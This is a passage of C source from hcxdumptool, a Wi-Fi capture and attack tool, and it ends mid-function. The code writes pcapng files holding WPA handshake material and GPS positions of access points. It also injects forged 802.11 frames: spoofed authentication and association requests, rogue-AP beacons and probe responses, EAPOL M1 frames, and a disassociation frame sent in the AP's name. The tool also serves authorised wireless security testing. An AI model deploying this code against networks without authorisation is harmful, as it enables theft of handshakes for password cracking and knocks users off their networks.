/*===========================================================================*/ /* frequency handling */ /*---------------------------------------------------------------------------*/ static u32 channel_to_frequency(u16 channel, u16 band) { if(channel <= 0) return 0; switch(band) { case NL80211_BAND_2GHZ: if(channel == 14) return 2484; else if (channel < 14) return 2407 + (channel * 5); break; case NL80211_BAND_5GHZ: if(channel >= 182 && channel <= 196) return 4000 + (channel * 5); else return 5000 + channel * 5; break; case NL80211_BAND_6GHZ: if(channel == 2) return 5935; if(channel <= 233) return 5950 + (channel * 5); break; case NL80211_BAND_60GHZ: if(channel < 7) return 56160 + (channel * 2160); break; #if(LINUX_VERSION_CODE >= KERNEL_VERSION(5, 10, 0)) case NL80211_BAND_S1GHZ: return 902000 + (channel * 500); #endif } return 0; } /*---------------------------------------------------------------------------*/ static u16 frequency_to_channel(u32 frequency) { if(frequency == 2484) return 14; else if(frequency < 2484) return (frequency - 2407) / 5; else if(frequency >= 4910 && frequency <= 4980) return (frequency - 4000) / 5; else if(frequency < 5925) return (frequency - 5000) / 5; else if(frequency == 5935) return 2; else if(frequency <= 45000) return (frequency - 5950) / 5; else if(frequency >= 58320 && frequency <= 70200) return (frequency - 56160) / 2160; else return 0; } /*===========================================================================*/ #ifdef NMEAOUT static void writegpwpl(size_t i) { static ssize_t p1; static ssize_t p2; static size_t c; static u8 cs; if(gprmclen == 0) return; if(write(fd_hcxpos, gprmc, gprmclen) != gprmclen) errorcount++; if(gpggalen != 0) { if(write(fd_hcxpos, gpgga, gpggalen) != gpggalen) errorcount++; } p1 = 0; p2 = 6; c = 0; cs = 0x5c; while((p1 < gprmclen) && (c < 7)) { if(gprmc[p1] == ',') c++; if(c > 2) { gpwpl[p2] = gprmc[p1]; cs ^= gpwpl[p2++]; } p1++; } for (p1 = 0; p1 < ETH_ALEN; ++p1) { gpwpl[p2] = lookuptable[((aplist + i)->macap[p1] & 0xf0) >> 4]; cs ^= gpwpl[p2++]; gpwpl[p2] = lookuptable[(aplist + i)->macap[p1] & 0xf]; cs ^= gpwpl[p2++]; } gpwpl[p2++] = '*'; gpwpl[p2++] = lookuptable[(cs & 0xf0) >> 4]; gpwpl[p2++] = lookuptable[cs & 0x0f]; gpwpl[p2++] = '\r'; gpwpl[p2++] = '\n'; if(write(fd_hcxpos, gpwpl, p2) != p2) errorcount++; gpwpl[p2++] = '\0'; if(((aplist + i)->ie.essidlen == 0) || ((aplist + i)->ie.essidlen > ESSID_MAX)) return; p2 = 7; cs = 0x63; for(p1 = 0; p1 < (aplist + i)->ie.essidlen; p1 ++) { gptxt[p2] = lookuptable[((aplist + i)->ie.essid[p1] & 0xf0) >> 4]; cs ^= gptxt[p2++]; gptxt[p2] = lookuptable[(aplist + i)->ie.essid[p1] & 0xf]; cs ^= gptxt[p2++]; } gptxt[p2++] = '*'; gptxt[p2++] = lookuptable[(cs & 0xf0) >> 4]; gptxt[p2++] = lookuptable[cs & 0x0f]; gptxt[p2++] = '\r'; gptxt[p2++] = '\n'; if(write(fd_hcxpos, gptxt, p2) != p2) errorcount++; gptxt[p2++] = '\0'; return; } #endif /*===========================================================================*/ static u16 addoption(u8 *posopt, u16 optioncode, u16 optionlen, char *option) { static u16 padding; static option_header_t *optionhdr; optionhdr = (option_header_t*)posopt; optionhdr->option_code = optioncode; optionhdr->option_length = optionlen; padding = (4 -(optionlen % 4)) % 4; memset(optionhdr->option_data, 0, optionlen +padding); memcpy(optionhdr->option_data, option, optionlen); return optionlen + padding + 4; } /*---------------------------------------------------------------------------*/ /* static u16 addcustomoptionheader(u8 *pospt) { static u16 colen; static option_header_t *optionhdr; optionhdr = (option_header_t*)pospt; optionhdr->option_code = SHB_CUSTOM_OPT; colen = OH_SIZE; memcpy(pospt +colen, &hcxmagic, 4); colen += 4; memcpy(pospt +colen, &hcxmagic, 32); colen += 32; return colen; } */ /*===========================================================================*/ static u16 addcustomoption(u8 *pospt) { static u16 colen; static option_header_t *optionhdr; static optionfield64_t *of; optionhdr = (option_header_t*)pospt; optionhdr->option_code = SHB_CUSTOM_OPT; colen = OH_SIZE; memcpy(pospt +colen, &hcxmagic, 4); colen += 4; memcpy(pospt +colen, &hcxmagic, 32); colen += 32; colen += addoption(pospt +colen, OPTIONCODE_MACAP, 6, (char*)macaprg); of = (optionfield64_t*)(pospt +colen); of->option_code = OPTIONCODE_RC; of->option_length = 8; of->option_value = replaycountrg; colen += 12; colen += addoption(pospt +colen, OPTIONCODE_ANONCE, 32, (char*)anoncerg); colen += addoption(pospt +colen, OPTIONCODE_MACCLIENT, 6, (char*)macclientrg); colen += addoption(pospt +colen, OPTIONCODE_SNONCE, 32, (char*)snoncerg); colen += addoption(pospt +colen, OPTIONCODE_WEAKCANDIDATE, strnlen(weakcandidate, PSK_MAX), weakcandidate); colen += addoption(pospt +colen, 0, 0, NULL); optionhdr->option_length = colen -OH_SIZE; return colen; } /*===========================================================================*/ static inline void writeepbm1(void) { static ssize_t epblen; static ssize_t ii; static u64 tsm1; static u16 padding; static total_length_t *totallength; ii = RTHTX_SIZE + EPB_SIZE; macftx = (ieee80211_mac_t*)&epbown[ii]; macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_DATA; macftx->from_ds = 1; macftx->duration = 0x0431; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; memcpy(&epbown[ii], &eapolm1data, EAPOLM1DATA_SIZE); ii += EAPOLM1DATA_SIZE; epbhdr = (enhanced_packet_block_t*)epbown; epblen = EPB_SIZE; epbhdr->block_type = EPBID; epbhdr->interface_id = 0; epbhdr->cap_len = ii; epbhdr->org_len = ii; tsm1 = tsakt - 1; epbhdr->timestamp_high = tsm1 >> 32; epbhdr->timestamp_low = (u32)tsm1 & 0xffffffff; padding = (4 -(epbhdr->cap_len % 4)) % 4; epblen += ii; memset(&epbown[epblen], 0, padding); epblen += padding; epblen += addoption(epbown +epblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(epbown +epblen); epblen += TOTAL_SIZE; epbhdr->total_length = epblen; totallength->total_length = epblen; if(write(fd_pcapng, &epbown, epblen) != epblen) errorcount++; return; } /*===========================================================================*/ static inline void writeepb(void) { static ssize_t epblen; static u16 padding; static total_length_t *totallength; epbhdr = (enhanced_packet_block_t*)epb; epblen = EPB_SIZE; epbhdr->block_type = EPBID; epbhdr->interface_id = 0; epbhdr->cap_len = packetlen; epbhdr->org_len = packetlen; epbhdr->timestamp_high = tsakt >> 32; epbhdr->timestamp_low = (u32)tsakt & 0xffffffff; padding = (4 -(epbhdr->cap_len % 4)) % 4; epblen += packetlen; memset(&epb[epblen], 0, padding); epblen += padding; epblen += addoption(epb +epblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(epb +epblen); epblen += TOTAL_SIZE; epbhdr->total_length = epblen; totallength->total_length = epblen; if(write(fd_pcapng, &epb, epblen) != epblen) errorcount++; return; } /*---------------------------------------------------------------------------*/ static bool writeshb(void) { static ssize_t shblen; static section_header_block_t *shbhdr; static total_length_t *totallength; static struct utsname unameData; static char sysinfo[SHB_SYSINFO_LEN]; static u8 shb[PCAPNG_BLOCK_SIZE]; memset(&shb, 0, PCAPNG_BLOCK_SIZE); shblen = SHB_SIZE; shbhdr = (section_header_block_t*)shb; shbhdr->block_type = PCAPNGBLOCKTYPE; shbhdr->byte_order_magic = PCAPNGMAGICNUMBER; shbhdr->major_version = PCAPNG_MAJOR_VER; shbhdr->minor_version = PCAPNG_MINOR_VER; shbhdr->section_length = -1; if(uname(&unameData) == 0) { shblen += addoption(shb +shblen, SHB_HARDWARE, strlen(unameData.machine), unameData.machine); snprintf(sysinfo, SHB_SYSINFO_LEN, "%s %s", unameData.sysname, unameData.release); shblen += addoption(shb +shblen, SHB_OS, strlen(sysinfo), sysinfo); snprintf(sysinfo, SHB_SYSINFO_LEN, "hcxdumptool %s", VERSION_TAG); shblen += addoption(shb +shblen, SHB_USER_APPL, strlen(sysinfo), sysinfo); } shblen += addcustomoption(shb +shblen); shblen += addoption(shb +shblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(shb +shblen); shblen += TOTAL_SIZE; shbhdr->total_length = shblen; totallength->total_length = shblen; if(write(fd_pcapng, &shb, shblen) != shblen) return false; return true; } /*---------------------------------------------------------------------------*/ static bool writeidb(void) { static ssize_t idblen; static interface_description_block_t *idbhdr; static total_length_t *totallength; static char tr[1]; static u8 idb[PCAPNG_BLOCK_SIZE]; memset(&idb, 0, PCAPNG_BLOCK_SIZE); idblen = IDB_SIZE; idbhdr = (interface_description_block_t*)idb; idbhdr->block_type = IDBID; idbhdr->linktype = DLT_IEEE802_11_RADIO; idbhdr->reserved = 0; idbhdr->snaplen = PCAPNG_SNAPLEN; idblen += addoption(idb +idblen, IF_NAME, strnlen(ifaktname, IF_NAMESIZE), ifaktname); idblen += addoption(idb +idblen, IF_MACADDR, 6, (char*)ifakthwmac); tr[0] = TSRESOL_NSEC; idblen += addoption(idb +idblen, IF_TSRESOL, 1, tr); idblen += addoption(idb +idblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(idb +idblen); idblen += TOTAL_SIZE; idbhdr->total_length = idblen; totallength->total_length = idblen; if(write(fd_pcapng, &idb, idblen) != idblen) return false; return true; } /*---------------------------------------------------------------------------*/ static bool writecb(void) { static ssize_t cblen; static custom_block_t *cbhdr; static optionfield64_t *of; static total_length_t *totallength; static u8 cb[PCAPNG_BLOCK_SIZE]; memset(&cb, 0, PCAPNG_BLOCK_SIZE); cbhdr = (custom_block_t*)cb; cblen = CB_SIZE; cbhdr->block_type = CBID; cbhdr->total_length = CB_SIZE; memcpy(cbhdr->pen, &hcxmagic, 4); memcpy(cbhdr->hcxm, &hcxmagic, 32); cblen += addoption(cb +cblen, OPTIONCODE_MACAP, 6, (char*)macaprg); of = (optionfield64_t*)(cb +cblen); of->option_code = OPTIONCODE_RC; of->option_length = 8; of->option_value = replaycountrg; cblen += 12; cblen += addoption(cb +cblen, OPTIONCODE_ANONCE, 32, (char*)anoncerg); cblen += addoption(cb +cblen, OPTIONCODE_MACCLIENT, 6, (char*)macclientrg); cblen += addoption(cb +cblen, OPTIONCODE_SNONCE, 32, (char*)snoncerg); cblen += addoption(cb +cblen, OPTIONCODE_WEAKCANDIDATE, strnlen(weakcandidate, PSK_MAX), weakcandidate); cblen += addoption(cb +cblen, 0, 0, NULL); totallength = (total_length_t*)(cb +cblen); cblen += TOTAL_SIZE; cbhdr->total_length = cblen; totallength->total_length = cblen; if(write(fd_pcapng, &cb, cblen) != cblen) return false; return true; } /*---------------------------------------------------------------------------*/ #ifdef NMEAOUT static bool writecbnmea(void) { static ssize_t cblen; static custom_block_t *cbhdr; static total_length_t *totallength; static u8 cb[PCAPNG_BLOCK_SIZE]; memset(&cb, 0, PCAPNG_BLOCK_SIZE); cbhdr = (custom_block_t*)cb; cblen = CB_SIZE; cbhdr->block_type = CBID; cbhdr->total_length = CB_SIZE; memcpy(cbhdr->pen, &hcxmagic, 4); memcpy(cbhdr->hcxm, &hcxmagic, 32); if(gprmclen > 2) cblen += addoption(cb +cblen, OPTIONCODE_NMEA, gprmclen - 2, gprmc); if(gpggalen > 2) cblen += addoption(cb +cblen, OPTIONCODE_NMEA, gpggalen - 2, gpgga); cblen += addoption(cb +cblen, 0, 0, NULL); totallength = (total_length_t*)(cb +cblen); cblen += TOTAL_SIZE; cbhdr->total_length = cblen; totallength->total_length = cblen; if(write(fd_pcapng, &cb, cblen) != cblen) return false; return true; } #endif /*---------------------------------------------------------------------------*/ static bool open_pcapng(char *pcapngoutname) { static int c; static struct stat statinfo; static char *pcapngfilename = NULL; static char pcapngname[PATH_MAX]; if(pcapngoutname == NULL) { c = 0; snprintf(pcapngname, PATH_MAX, "%s-%s.pcapng", timestring1, ifaktname); while(stat(pcapngname, &statinfo) == 0) { snprintf(pcapngname, PATH_MAX, "%s-%s-%02d.pcapng", timestring1, ifaktname, c); c++; } pcapngfilename = pcapngname; } else pcapngfilename = pcapngoutname; umask(0); if((fd_pcapng = open(pcapngfilename, O_WRONLY | O_TRUNC | O_CREAT, 0777)) < 0) return false; if(writeshb() == false) return false; if(writeidb() == false) return false; if(writecb() == false) return false; return true; } /*===========================================================================*/ /*===========================================================================*/ /* TX 802.11 */ /*===========================================================================*/ static inline void send_80211_associationrequest_org(size_t i) { ssize_t ii; ii = RTHTXNOACK_SIZE; macftx = (ieee80211_mac_t*)&wltxnoackbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; wltxnoackbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, (aplist + i)->macclient, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter2++ << 4; if(seqcounter1 > 4095) seqcounter2 = 1; ii += MAC_SIZE_NORM; memcpy(&wltxnoackbuffer[ii], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); ii += ASSOCIATIONREQUESTCAPA_SIZE; wltxnoackbuffer[ii ++] = 0; wltxnoackbuffer[ii ++] = (aplist + i)->ie.essidlen; memcpy(&wltxnoackbuffer[ii], (aplist + i)->ie.essid, (aplist + i)->ie.essidlen); ii += (aplist + i)->ie.essidlen; memcpy(&wltxnoackbuffer[ii], &associationrequestdata, ASSOCIATIONREQUEST_SIZE); if(((aplist + i)->ie.flags & APGS_CCMP) == APGS_CCMP) wltxnoackbuffer[ii +0x17] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APGS_TKIP) == APGS_TKIP) wltxnoackbuffer[ii +0x17] = RSN_CS_TKIP; if(((aplist + i)->ie.flags & APCS_CCMP) == APCS_CCMP) wltxnoackbuffer[ii +0x1d] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APCS_TKIP) == APCS_TKIP) wltxnoackbuffer[ii +0x1d] = RSN_CS_TKIP; ii += ASSOCIATIONREQUEST_SIZE; if((write(fd_socket_tx, &wltxnoackbuffer, ii)) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_associationrequest(size_t i) { ssize_t ii; ii = RTHTX_SIZE; macftx = (ieee80211_mac_t*)&wltxbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; wltxbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macclientrg, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter2++ << 4; if(seqcounter1 > 4095) seqcounter2 = 1; ii += MAC_SIZE_NORM; memcpy(&wltxbuffer[ii], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); ii += ASSOCIATIONREQUESTCAPA_SIZE; wltxbuffer[ii ++] = 0; wltxbuffer[ii ++] = (aplist + i)->ie.essidlen; memcpy(&wltxbuffer[ii], (aplist + i)->ie.essid, (aplist + i)->ie.essidlen); ii += (aplist + i)->ie.essidlen; memcpy(&wltxbuffer[ii], &associationrequestdata, ASSOCIATIONREQUEST_SIZE); if(((aplist + i)->ie.flags & APGS_CCMP) == APGS_CCMP) wltxbuffer[ii +0x17] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APGS_TKIP) == APGS_TKIP) wltxbuffer[ii +0x17] = RSN_CS_TKIP; if(((aplist + i)->ie.flags & APCS_CCMP) == APCS_CCMP) wltxbuffer[ii +0x1d] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APCS_TKIP) == APCS_TKIP) wltxbuffer[ii +0x1d] = RSN_CS_TKIP; ii += ASSOCIATIONREQUEST_SIZE; if((write(fd_socket_tx, &wltxbuffer, ii)) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_eap_request_id(void) { static ssize_t ii; ii = RTHTX_SIZE; macftx = (ieee80211_mac_t*)&wltxbuffer[ii]; macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_DATA; wltxbuffer[ii + 1] = 0; macftx->from_ds = 1; macftx->duration = 0x0431; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; memcpy(&wltxbuffer[ii], &eaprequestiddata, EAPREQUESTID_SIZE); ii += EAPREQUESTID_SIZE; if(write(fd_socket_tx, wltxbuffer, ii) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_eapol_m1(void) { static ssize_t ii; ii = RTHTX_SIZE; macftx = (ieee80211_mac_t*)&wltxbuffer[ii]; macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_DATA; wltxbuffer[ii + 1] = 0; macftx->from_ds = 1; macftx->duration = 0x0431; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; memcpy(&wltxbuffer[ii], &eapolm1data, EAPOLM1DATA_SIZE); ii += EAPOLM1DATA_SIZE; if(write(fd_socket_tx, wltxbuffer, ii) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_reassociationresponse(u16 aid) { static ssize_t ii; static ieee80211_assoc_or_reassoc_resp_t *associationresponsetx; ii = RTHTX_SIZE; macftx = (ieee80211_mac_t*)&wltxbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_RESP; wltxbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; associationresponsetx = (ieee80211_assoc_or_reassoc_resp_t*)&wltxbuffer[ii]; associationresponsetx->capability = 0x431; associationresponsetx->status = 0; associationresponsetx->aid = aid; ii += IEEE80211_ASSOCIATIONRESPONSE_SIZE; memcpy(&wltxbuffer[ii], &associationresponsedata, ASSOCIATIONRESPONSEDATA_SIZE); ii += ASSOCIATIONRESPONSEDATA_SIZE; if(write(fd_socket_tx, &wltxbuffer, ii) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_associationresponse(void) { static ssize_t ii; static ieee80211_assoc_or_reassoc_resp_t *associationresponsetx; ii = RTHTX_SIZE; macftx = (ieee80211_mac_t*)&wltxbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_RESP; wltxbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; associationresponsetx = (ieee80211_assoc_or_reassoc_resp_t*)&wltxbuffer[ii]; associationresponsetx->capability = 0x431; associationresponsetx->status = 0; associationresponsetx->aid = 1; ii += IEEE80211_ASSOCIATIONRESPONSE_SIZE; memcpy(&wltxbuffer[ii], &associationresponsedata, ASSOCIATIONRESPONSEDATA_SIZE); ii += ASSOCIATIONRESPONSEDATA_SIZE; if(write(fd_socket_tx, &wltxbuffer, ii) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_authenticationresponse(void) { macftx = (ieee80211_mac_t*)&wltxbuffer[RTHTX_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; wltxbuffer[RTHTX_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macfrx->addr1, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; memcpy(&wltxbuffer[RTHTX_SIZE + MAC_SIZE_NORM], authenticationresponsedata, AUTHENTICATIONRESPONSE_SIZE); if((write(fd_socket_tx, &wltxbuffer, RTHTX_SIZE + MAC_SIZE_NORM + AUTHENTICATIONRESPONSE_SIZE)) == RTHTX_SIZE + MAC_SIZE_NORM + AUTHENTICATIONRESPONSE_SIZE) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_reassociationrequest(size_t i) { static ssize_t ii; static ieee80211_reassoc_req_t *reassociationrequest; ii = RTHTXNOACK_SIZE; macftx = (ieee80211_mac_t*)&wltxnoackbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_REQ; wltxnoackbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, (aplist + i)->macap, ETH_ALEN); memcpy(macftx->addr2, (aplist + i)->macclient, ETH_ALEN); memcpy(macftx->addr3, (aplist + i)->macap, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; reassociationrequest = (ieee80211_reassoc_req_t*)&wltxnoackbuffer[ii]; reassociationrequest->capability = 0x431; reassociationrequest->listen_interval = 0x14; memcpy(reassociationrequest->current_macap, (aplist + i)->macap, ETH_ALEN); ii += sizeof(ieee80211_reassoc_req_t); wltxnoackbuffer[ii ++] = 0; wltxnoackbuffer[ii ++] = (aplist + i)->ie.essidlen; memcpy(&wltxnoackbuffer[ii], (aplist + i)->ie.essid, (aplist + i)->ie.essidlen); ii += (aplist + i)->ie.essidlen; memcpy(&wltxnoackbuffer[ii], &reassociationrequestdata, REASSOCIATIONREQUEST_SIZE); if(((aplist + i)->ie.flags & APGS_CCMP) == APGS_CCMP) wltxnoackbuffer[ii +0x17] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APGS_TKIP) == APGS_TKIP) wltxnoackbuffer[ii +0x17] = RSN_CS_TKIP; if(((aplist + i)->ie.flags & APCS_CCMP) == APCS_CCMP) wltxnoackbuffer[ii +0x1d] = RSN_CS_CCMP; else if(((aplist + i)->ie.flags & APCS_TKIP) == APCS_TKIP) wltxnoackbuffer[ii +0x1d] = RSN_CS_TKIP; ii += REASSOCIATIONREQUEST_SIZE; if((write(fd_socket_tx, &wltxnoackbuffer, ii)) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_authenticationrequestnoack(void) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; wltxnoackbuffer[RTHTX_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macclientrg, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter2++ << 4; if(seqcounter1 > 4095) seqcounter2 = 1; memcpy(&wltxnoackbuffer[RTHTXNOACK_SIZE + MAC_SIZE_NORM], authenticationrequestdata, AUTHENTICATIONREQUEST_SIZE); if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + AUTHENTICATIONREQUEST_SIZE)) == RTHTXNOACK_SIZE + MAC_SIZE_NORM + AUTHENTICATIONREQUEST_SIZE) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_authenticationrequest(void) { macftx = (ieee80211_mac_t*)&wltxbuffer[RTHTX_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; wltxbuffer[RTHTX_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macfrx->addr2, ETH_ALEN); memcpy(macftx->addr2, macclientrg, ETH_ALEN); memcpy(macftx->addr3, macfrx->addr3, ETH_ALEN); macftx->sequence = seqcounter2++ << 4; if(seqcounter1 > 4095) seqcounter2 = 1; memcpy(&wltxbuffer[RTHTX_SIZE + MAC_SIZE_NORM], authenticationrequestdata, AUTHENTICATIONREQUEST_SIZE); if((write(fd_socket_tx, &wltxbuffer, RTHTX_SIZE + MAC_SIZE_NORM + AUTHENTICATIONREQUEST_SIZE)) == RTHTX_SIZE + MAC_SIZE_NORM + AUTHENTICATIONREQUEST_SIZE) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_probereresponse(u8 *macclientrsp, u8 *macaprgrsp, u8 essidlenrsp, u8 *essidrsp) { static ssize_t ii; static ieee80211_beacon_proberesponse_t *beacontx; ii = RTHTXNOACK_SIZE; macftx = (ieee80211_mac_t*)&wltxnoackbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_RESP; wltxnoackbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macclientrsp, ETH_ALEN); memcpy(macftx->addr2, macaprgrsp, ETH_ALEN); memcpy(macftx->addr3, macaprgrsp, ETH_ALEN); macftx->sequence = seqcounter3++ << 4; if(seqcounter1 > 4095) seqcounter3 = 1; ii += MAC_SIZE_NORM; beacontx = (ieee80211_beacon_proberesponse_t*)&wltxnoackbuffer[ii]; beacontx->timestamp = beacontimestamp++; beacontx->beacon_interval = 1024; beacontx->capability = 0x431; ii += IEEE80211_PROBERESPONSE_SIZE; wltxnoackbuffer[ii ++] = 0; wltxnoackbuffer[ii ++] = essidlenrsp; memcpy(&wltxnoackbuffer[ii], essidrsp, essidlenrsp); ii += essidlenrsp; memcpy(&wltxnoackbuffer[ii], proberesponsedata, PROBERESPONSEDATA_SIZE); wltxnoackbuffer[ii + 0x0c] = (u8)(scanlist + scanlistindex)->channel; ii += PROBERESPONSEDATA_SIZE; if((write(fd_socket_tx, &wltxnoackbuffer, ii)) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_beacon(void) { static ssize_t ii; static ieee80211_beacon_proberesponse_t *beacontx; beaconindex++; if(beaconindex >= beacontxmax) beaconindex = 0; if((aprglist + beaconindex)->essidlen == 0) beaconindex = 0; ii = RTHTXNOACK_SIZE; macftx = (ieee80211_mac_t*)&wltxnoackbuffer[ii]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; wltxnoackbuffer[ii + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macbc, ETH_ALEN); memcpy(macftx->addr2, (aprglist + beaconindex)->macaprg, ETH_ALEN); memcpy(macftx->addr3, (aprglist + beaconindex)->macaprg, ETH_ALEN); macftx->sequence = seqcounter4++ << 4; if(seqcounter1 > 4095) seqcounter4 = 1; ii += MAC_SIZE_NORM; beacontx = (ieee80211_beacon_proberesponse_t*)&wltxnoackbuffer[ii]; beacontx->timestamp = beacontimestamp++; beacontx->beacon_interval = 1024; beacontx->capability = 0x431; ii += IEEE80211_BEACON_SIZE; wltxnoackbuffer[ii ++] = 0; wltxnoackbuffer[ii ++] = (aprglist + beaconindex)->essidlen; memcpy(&wltxnoackbuffer[ii], (aprglist + beaconindex)->essid, (aprglist + beaconindex)->essidlen); ii += (aprglist + beaconindex)->essidlen; memcpy(&wltxnoackbuffer[ii], beacondata, BEACONDATA_SIZE); wltxnoackbuffer[ii + 0x0c] = (u8)(scanlist + scanlistindex)->channel; ii += BEACONDATA_SIZE; if((write(fd_socket_tx, &wltxnoackbuffer, ii)) == ii) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_proberequest_undirected(void) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; wltxnoackbuffer[RTHTXNOACK_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macbc, ETH_ALEN); memcpy(macftx->addr2, macclientrg, ETH_ALEN); memcpy(macftx->addr3, macbc, ETH_ALEN); macftx->sequence = seqcounter2++ << 4; if(seqcounter1 > 4095) seqcounter2 = 1; memcpy(&wltxnoackbuffer[RTHTXNOACK_SIZE + MAC_SIZE_NORM], proberequest_undirected_data, PROBEREQUEST_UNDIRECTED_SIZE); if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + PROBEREQUEST_UNDIRECTED_SIZE)) == RTHTXNOACK_SIZE + MAC_SIZE_NORM + PROBEREQUEST_UNDIRECTED_SIZE) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_disassociation_fm_ap(const u8* macclient, const u8* macap, u8 reason) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DISASSOC; wltxnoackbuffer[RTHTXNOACK_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, 